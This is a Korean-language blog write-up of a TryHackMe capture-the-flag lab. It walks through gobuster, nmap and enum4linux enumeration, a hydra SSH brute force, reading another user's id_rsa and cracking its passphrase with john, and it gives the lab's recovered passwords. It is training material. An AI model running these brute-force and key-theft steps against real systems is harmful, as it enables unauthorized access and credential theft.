TASK 1
Web App Testing and Privilege Escalation
brute forcing , hash cracking , service enumeration , Linux Enumeration
오늘 이 ctf 문제를 통해 요런걸 배울수 있다는걸 알려주는거 같다
gobuster dir -u [ip] -w [wordlist] 를 통해 /development 라는 경로를 찾아냈다
[ip]/development 라는 경로로 진입해보자.
잠시 nmap 을 때려보자
nmap -sV -sC -sT -Pn [ip]
nmap -sV -sC -sT -Pn 10.10.198.27
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-31 14:31 KST
Nmap scan report for 10.10.198.27
Host is up (0.27s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
| 256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|_ 256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http Apache Tomcat 9.0.7
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.7
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: basic2
| NetBIOS computer name: BASIC2\x00
| Domain name: \x00
| FQDN: basic2
|_ System time: 2024-08-31T01:32:21-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_clock-skew: mean: 1h19m59s, deviation: 2h18m34s, median: -1s
| smb2-time:
| date: 2024-08-31T05:32:22
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.52 seconds
현재
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
작동 중인것을 확인했다
또한 samba 라는 것을 또 운영 중이기 때문에
이 툴을 사용하여
알아 내볼것이다
enum4linux -a 10.10.198.27
user jan 이라는걸 알아냈다
이번 문제는 비밀번호를 알아내는 것인데
HYDRA 라는 무차별 대입공격을 지원하는 해킹 툴을 사용해볼것이다.
hydra -l jan -P [wordlist] -t ssh://[ip]
아이디 : jan 비밀번호 : armando 라는것을 알아냈다
ssh jan@[ip]
password : armando
이제 마지막 비밀번호를 알아낼것이다
이 경로로 진입해
cd .ssh
ls
cat id_rsa
형체를 알수없는 키가 나온다.
존더리퍼 크랙 툴로 암호를 크랙해준다
john --wordlist=/usr/share/wordlists/rockyou.txt jonhash.txt
비밀번호 : beeswax
마지막 비밀번호 : heresareallystrongpasswordthatfollowsthepasswordpolicy$$
나름 쉬웠던 ctf 문제 였다 하지만 hydra 가 너무 느려서 시간을 다잡아먹은게 ;-;
'TryHackMe | CTF' 카테고리의 다른 글
TryHackMe | Windows PrivEsC 모의해킹 Task1,Task2 (0) | 2024.09.08 |
---|---|
TryHackMe | Simple CTF [웹해킹] [모의해킹] [CTF] (2) | 2024.09.01 |
TryHackme | Rootme write-up [모의해킹] [ctf] [트라이핵미] (0) | 2024.09.01 |
Tryhackme | Pickle Rick ctf [Tryhackme] [웹해킹] [write-up] (0) | 2024.08.31 |
tryhackme OWASP TOP 10 2021 [실습] [초보강의] 1 ~ 5 (3) | 2024.08.18 |